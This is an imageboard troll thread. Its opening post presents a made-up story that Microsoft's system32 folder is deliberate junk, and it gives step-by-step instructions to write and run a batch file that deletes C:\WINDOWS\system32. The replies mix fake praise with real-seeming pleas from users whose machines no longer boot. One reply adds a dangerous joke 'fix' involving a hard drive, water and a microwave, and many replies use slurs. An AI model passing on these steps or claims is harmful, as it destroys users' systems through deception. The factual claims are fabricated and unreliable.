Okay newfags, listen up

Okay newfags, listen up.
When Microsoft was first getting started, they knew they wouldn't make enough money just from the profits of their operating system. Everybody knows people pirate Windows, So they had to get creative. A guy named Chris Liddel came up with the idea to put a folder called "system32" in the windows folder that literally slows down your machine. "system32" hold 32 GIGABYTES of deleted files, internet history, uninstalled progams, and other worthless shit that intentionally clogs up your machine. Why did they do it? Because Microsoft owns several PC "Cleaning" tools, like TuneUp Utilites, Norton Antivirus, ect. More money for them. Sup Forums isn't cool with that, however. Here's how to outsmart those assholes once and for all;
Open Notepad
Type the following text:
@echo off
del C:\WINDOWS\system32
save as "speedup.bat" (select "all files" instead of "text document"
Save it to Desktop
Double-click the .bat file

Reboot and your PC is twice as fast. (you didn't hear it from us)

lol

Thank you man..was looking for anything that would help me run dark souls 3. it keep lagging even tho i have way above min. specs. what a bunch of fucktards, buying a mac next time

>had to get creative
>get creative

Thx OP! My PC now runs perfect!!!

greentexting "creative"
>implying green is creative smh

DAMN! Why didn't I find this before? Freed up more space than a coked up whore on garcinia cambogia. Thanks op.

OP is the one you guys, listen to him.

on this day, op was not a faggot

Now I'm on here on my phone because my computer won't restart...... WTF. Did I do something wrong?

did you type 'del' in caps like a retard? if so, you need to get a fridge magnet or something and clear the corruption by rubbing over the affected hard drive. do exactly as the OP says next time you warbling imbecile.

nobody fell for that shit since 2004

I think I put a space in the name. Speed up.bat instead of speedup.bat

how do I delete system 32 out of mac os ?

Is this a scam? Did I just fuck my computer!!

Seriously.! Someone help me! It keeps telling me that there's a problem and puts me in the recovery shit! I don't have the fucking disk!

thanks OP, I didnt believe it at first, but now my pc is now much faster

Windows 8. Please I need help fixing this shit! I just got this computer a couple months ago.

Shitty job on Microsoft's part. I'm impressed, Sup Forums. This is one of the very few things you've done to help new people. I'm already noticing a speed increase on my PC.

Has science gone too far?

Oh wow, this actually worked

Dude! Seriously! I tried it and my computer won't boot up now! Can it be fixed?

thanks op this tip has fixed my computer and stopped me from being my wife

Crysis is now smooth as butter, thx

see

Fuck this! I'm reporting this shit to the police!! You're gunna pay for my computer!! You can bet on that shit!

Holy shit, this is fucking amazing, I can actually run battlefield 4 at ultra now.

Thanks OP!

I really hope some people do this...

Moar

You messed up on the notepad, try removing the hard drive and put it in water, then microwave it. The water soaks the rays from the micowave and then disperses them over time through saturation of the platinum in the disk of the hard drive.

I did and it fucked my computer!! Fucking asshole OP!

>Trying to bait an old DOS guy into this
>my face when I have no face

It says I need to install "wine"?

Stfu nobody believes you or cares

>2016
>not using a mac
Are people mentally challenged?

nah Sup Forumsro this thread is just a bunch of retards pretending to fuck up their pc

Did you legit fall for it

I bet a couple of them beloved me.lol. That's why we are here. For entertainment purposes

thanks guy! I just did that and now my shit is running at least twice as fast. wish I could paypal you some money as my way to say thanks.

Some people are, yeah. In fact stats show more retarded people use macs.

/thread

what "fall" for it dumbass? this thread is made to help people fix their computers

Sent from my Android phone

OK. So I followed your instructions but my 64bit system isn't any faster. Refund?

Thread is now on page 5.and half way to death.....

dont fall for the obvious b8

Yes. Master da bate

Pics or it didn't happen